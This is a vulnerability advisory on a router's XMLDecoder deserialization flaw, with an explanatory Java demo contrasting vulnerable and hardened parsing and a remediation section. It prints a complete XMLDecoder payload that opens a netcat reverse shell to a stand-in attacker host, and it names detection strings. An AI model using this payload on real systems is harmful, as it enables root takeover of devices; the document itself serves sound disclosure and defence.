Vulnerability Overview
During a targeted infrastructure assessment, the OdiVex Threat Research Team identified a critical vulnerability in the administrative daemon of the DataStream Enterprise Router (versions 4.1.0 through 4.5.2). The vulnerability allows an unauthenticated, remote attacker to execute arbitrary system commands with root privileges.
The Exploit Mechanism
The daemon exposes a diagnostic API endpoint on port 8443 that feeds the untrusted XML body of an HTTP POST request into a Java deserializer without validating it. Using an XML External Entity (XXE) chain that pivots into the Java-based backend routing engine, we bypassed the initial authentication filter; the request then reaches the deserializer, which is java.beans.XMLDecoder. The payload below is therefore not an XXE document but an XMLDecoder script: XMLDecoder interprets the XML as a sequence of constructor and method calls, so <object class="java.lang.Runtime" method="getRuntime"> invokes the static factory, <void method="exec"> calls Runtime.exec() with the three-element String[] assembled by the <array> element, and because the daemon runs as root the resulting reverse shell is a root shell.
<java version="1.8.0" class="java.beans.XMLDecoder">
  <!-- static call: java.lang.Runtime.getRuntime() -->
  <object class="java.lang.Runtime" method="getRuntime">
    <!-- instance call on the returned Runtime: exec(String[]) -->
    <void method="exec">
      <array class="java.lang.String" length="3">
        <void index="0"><string>/bin/sh</string></void>
        <void index="1"><string>-c</string></void>
        <void index="2"><string>nc -e /bin/sh attacker.com 4444</string></void>
      </array>
    </void>
  </object>
</java>
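To make the mechanism concrete, the following program is an added example written for this page; it is not DataStream's code and was not part of the OdiVex write-up. It contrasts the vulnerable pattern (handing the request body to java.beans.XMLDecoder) with a hardened handler that parses the same bytes with a plain StAX reader, DTDs and external entities disabled, and accepts only an allowlisted set of element names. The XMLDecoder document it feeds to the vulnerable handler is a constructed, harmless variant of the page's payload that stops at Runtime.getRuntime(), so running it is safe; the element allowlist ("diagnostic", "ping") and the sample legitimate request are assumptions, since the real diagnostic schema is not public. Requires Java 11 or later.

```java
import java.beans.XMLDecoder;
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import java.util.Set;
import javax.xml.stream.XMLInputFactory;
import javax.xml.stream.XMLStreamConstants;
import javax.xml.stream.XMLStreamException;
import javax.xml.stream.XMLStreamReader;

public class XmlDecoderDemo {

    // Constructed, harmless XMLDecoder document for this demo. It has the same
    // shape as the advisory's payload but only reaches Runtime.getRuntime() and
    // calls availableProcessors(); replacing that method name with "exec" and
    // supplying a String[] argument turns it into the real payload.
    static final String BENIGN = ""
        + "<java version=\"1.8.0\" class=\"java.beans.XMLDecoder\">"
        + "  <object class=\"java.lang.Runtime\" method=\"getRuntime\">"
        + "    <void method=\"availableProcessors\"/>"
        + "  </object>"
        + "</java>";

    // Assumed shape of a legitimate diagnostic request (placeholder schema;
    // the real DataStream diagnostic schema is not public).
    static final String LEGIT =
        "<diagnostic><ping target=\"10.0.0.1\" count=\"3\"/></diagnostic>";

    // VULNERABLE: the pattern the advisory describes. XMLDecoder is effectively
    // a script interpreter: <object class=...> instantiates or calls any class on
    // the classpath and <void method=...> invokes any public method on it.
    static Object vulnerableDecode(byte[] body) {
        try (XMLDecoder decoder = new XMLDecoder(new ByteArrayInputStream(body))) {
            return decoder.readObject();
        }
    }

    // HARDENED: never hand untrusted bytes to XMLDecoder. Read the document with
    // a StAX parser, refuse DTDs and external entities (closing the XXE avenue),
    // and reject any element outside the assumed diagnostic schema.
    static final Set<String> ALLOWED_ELEMENTS = Set.of("diagnostic", "ping");

    static void hardenedParse(byte[] body) throws XMLStreamException {
        XMLInputFactory factory = XMLInputFactory.newFactory();
        factory.setProperty(XMLInputFactory.SUPPORT_DTD, false);
        factory.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
        XMLStreamReader reader = factory.createXMLStreamReader(new ByteArrayInputStream(body));
        try {
            while (reader.hasNext()) {
                if (reader.next() == XMLStreamConstants.START_ELEMENT) {
                    String name = reader.getLocalName();
                    if (!ALLOWED_ELEMENTS.contains(name)) {
                        throw new XMLStreamException("rejected element <" + name + ">");
                    }
                }
            }
        } finally {
            reader.close();
        }
    }

    public static void main(String[] args) throws Exception {
        byte[] benign = BENIGN.getBytes(StandardCharsets.UTF_8);

        // Attacker-controlled text reaches java.lang.Runtime through the decoder.
        Object result = vulnerableDecode(benign);
        System.out.println("XMLDecoder returned an instance of " + result.getClass().getName());

        // The hardened handler accepts the schema-conformant request ...
        hardenedParse(LEGIT.getBytes(StandardCharsets.UTF_8));
        System.out.println("hardened parser accepted the diagnostic request");

        // ... and rejects the XMLDecoder document at its root element.
        try {
            hardenedParse(benign);
        } catch (XMLStreamException e) {
            System.out.println("hardened parser: " + e.getMessage());
        }
    }
}
```

The point of the contrast is that the fix is not a filter on dangerous class names (the set of usable gadgets in XMLDecoder is open-ended) but removing XMLDecoder from the untrusted-input path altogether and parsing against a schema the endpoint actually defines.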
Remediation & Disclosure
OdiVex worked directly with DataStream under a coordinated disclosure timeline. Administrators are urged to update to firmware version 4.5.3 immediately and to restrict access to port 8443 to internal management VLANs. Until the update is applied, POST requests to the diagnostic endpoint whose body contains class="java.beans.XMLDecoder" or references java.lang.Runtime are a strong indicator of exploitation attempts and should be logged and blocked.